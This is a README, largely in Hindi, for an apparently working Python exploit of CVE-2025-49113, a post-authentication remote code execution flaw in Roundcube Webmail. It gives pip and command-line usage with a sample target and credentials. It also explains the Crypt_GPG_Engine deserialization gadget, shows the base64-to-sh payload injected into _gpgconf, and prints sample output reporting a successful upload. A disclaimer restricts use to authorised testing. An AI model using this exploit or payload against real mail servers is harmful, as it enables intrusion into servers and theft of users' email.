
💥 Python Exploit for CVE-2025-49113 | Roundcube Webmail RCE via PHP Object Injection
CVE ID: CVE-2025-49113
एक्सप्लॉइट प्रकार: दूरस्थ कोड निष्पादन (PHP ऑब्जेक्ट इंजेक्शन के माध्यम से)
एप्लिकेशन: Roundcube Webmail ≤ 1.5.9 और ≤ 1.6.10
एक्सप्लॉइट भाषा: Python
लेखक: 00xCanelo
स्थिति: संवेदनशील Roundcube इंस्टॉलेशन पर परीक्षित और कार्यशील
यह एक्सप्लॉइट Roundcube Webmail द्वारा अपलोड की गई छवि फ़ाइल नामों को PHP ऑब्जेक्ट के रूप में अनसीरियलाइज़ करने में एक भेद्यता का लाभ उठाता है। एक दुर्भावनापूर्ण पेलोड तैयार करके जो Crypt_GPG_Engine डिसीरियलाइज़ेशन श्रृंखला को ट्रिगर करता है, प्रमाणीकरण के बाद दूरस्थ कमांड निष्पादन प्राप्त किया जा सकता है।
यह Python PoC सार्वजनिक PHP एक्सप्लॉइट द्वारा उपयोग की गई हमले की श्रृंखला की नकल करता है, लेकिन साफ तर्क, वैकल्पिक लॉगिंग और आक्रामक टूलिंग सेटअप में उपयोग में आसानी के साथ।
pip install requestspython3 CVE-2025-49113.py <target_url> <username> <password> <command>
python3 CVE-2025-49113.py https://mail.target.htb/ [email protected] 'P@ssw0rd123' 'id'
PHP क्लास Crypt_GPG_Engine एक _gpgconf फ़ील्ड सेट करने की अनुमति देता है, जिसे बाद में शेल निष्पादन के लिए पास किया जाता है।
हमारा पेलोड तैयार करता है:
echo "<base64-encoded-cmd>" | base64 -d | sh
_gpgconf में, जो डिसीरियलाइज़ेशन पर RCE की ओर ले जाता है।
[*] CVE-2025-49113 एक्सप्लॉइट शुरू हो रहा है...
[*] Roundcube संस्करण की जाँच की जा रही है...
[*] Roundcube संस्करण पाया गया: 10606
[+] लक्ष्य संवेदनशील है!
[*] लॉग इन किया जा रहा है...
[+] लॉगिन सफल।
[*] सीरियलाइज़्ड गैजेट को छवि फ़ाइल नाम के रूप में अपलोड किया जा रहा है...
[+] गैजेट सफलतापूर्वक अपलोड हो गया!
.
├── CVE-2025-49113.py # Python PoC स्क्रिप्ट
└── README.md # यह दस्तावेज़ीकरण
यह कोड केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। इस उपकरण का कोई भी दुरुपयोग सख्त वर्जित है। लेखक किसी भी हुए नुकसान के लिए जिम्मेदार नहीं है।